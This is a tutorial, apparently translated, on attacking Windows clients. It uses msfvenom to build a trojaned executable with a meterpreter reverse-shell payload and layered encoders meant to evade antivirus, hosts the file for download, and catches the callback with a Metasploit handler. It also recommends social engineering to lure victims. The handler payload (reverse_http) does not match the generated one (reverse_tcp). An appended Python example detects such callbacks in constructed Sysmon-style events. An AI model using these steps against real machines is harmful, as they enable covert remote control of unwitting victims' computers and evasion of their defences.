Client-side penetration on Windows
Principle of client-side penetration
When we cannot break through the target's network boundary, we often have to attack through the client instead: for example, we send the target a program that contains a backdoor, or a Word document or PDF file. For this to work, social engineering is also needed to lure the victim into executing the malicious program.
Since anti-virus software will be present, we rely either on a color website or on AV evasion ("avoid killing") so that the program is not detected.
AV evasion can be achieved by modifying the binary's characteristic bytes (its signature) or by encrypting it.
Hands-on
Generating Windows malware to get a shell
msfvenom combines the old msfpayload and msfencode tools: it generates a Trojan program that is executed on the target machine while a listener waits locally for the connection back.
Generate the xx影音.exe backdoor program
Use an encoder
Command: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.139.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/xx影音1.exe
Use two encoders in a chain to further improve evasion
Command: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 20 | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f exe -o /var/www/html/xx影音2.exe
Parameter description
-a specifies the architecture, e.g. x86 or x64; x86 means 32-bit and x64 means 64-bit.
--platform specifies the platform; windows is chosen here. All supported platforms can be listed with -l platforms.
-p sets the attack payload.
-b removes bad characters; bad characters would interfere with the normal execution of the payload.
Start apache2
Command: systemctl start apache2
On the target machine, browse to the site, click download and open the file
Command:
Go back to Kali and start the listener
Command: msf
Enter the multi/handler module
Set the payload
Command: set payload windows/meterpreter/reverse_http
Set the listener that will receive the reverse connection from the target machine
Start the attack
Command: run
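As an added defender-side example (not part of the original tutorial), the following Python correlates constructed Sysmon-style process-create and network-connect events to flag the behaviour the steps above produce: an executable run from a user-writable download location that connects out to the listener (the LHOST/LPORT values used above) within seconds of starting. The field names, paths and event values are assumptions modelled on Sysmon, not taken from a real log.

```python
"""Detection example: flag a freshly downloaded executable that makes an
outbound connection shortly after it starts (the reverse_tcp pattern above)."""
from datetime import datetime, timedelta

# Constructed Sysmon-style events (EventID 1 = process create, 3 = network connect).
# Field names mirror Sysmon's; all values are made up for this example.
EVENTS = [
    {"EventID": 1, "UtcTime": "2023-01-26 08:40:01", "ProcessId": 4120,
     "Image": r"C:\Users\victim\Downloads\xx影音1.exe",
     "ParentImage": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    {"EventID": 3, "UtcTime": "2023-01-26 08:40:03", "ProcessId": 4120,
     "Image": r"C:\Users\victim\Downloads\xx影音1.exe",
     "DestinationIp": "192.168.139.129", "DestinationPort": 4444, "Initiated": True},
    {"EventID": 1, "UtcTime": "2023-01-26 08:41:00", "ProcessId": 5008,
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "UtcTime": "2023-01-26 08:41:02", "ProcessId": 5008,
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443, "Initiated": True},
]

USER_WRITABLE = ("\\downloads\\", "\\appdata\\local\\temp\\", "\\desktop\\")
WINDOW = timedelta(seconds=30)  # assumed: callback usually follows launch at once

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def find_suspicious_callbacks(events, window=WINDOW):
    """Return (pid, image, "ip:port") for processes started from a user-writable
    directory that initiate an outbound connection within `window` of starting."""
    started = {}  # pid -> (image, start time) for processes worth watching
    hits = []
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        image = ev["Image"].lower()
        if ev["EventID"] == 1 and any(d in image for d in USER_WRITABLE):
            started[ev["ProcessId"]] = (ev["Image"], _ts(ev["UtcTime"]))
        elif ev["EventID"] == 3 and ev.get("Initiated") and ev["ProcessId"] in started:
            img, t0 = started[ev["ProcessId"]]
            if _ts(ev["UtcTime"]) - t0 <= window:
                hits.append((ev["ProcessId"], img,
                             f"{ev['DestinationIp']}:{ev['DestinationPort']}"))
    return hits

if __name__ == "__main__":
    for hit in find_suspicious_callbacks(EVENTS):
        print("ALERT downloaded binary called back:", hit)
```

The browser's own HTTPS connection is not flagged because firefox.exe does not live in a user-writable directory; only the downloaded executable's connection to 192.168.139.129:4444 is reported.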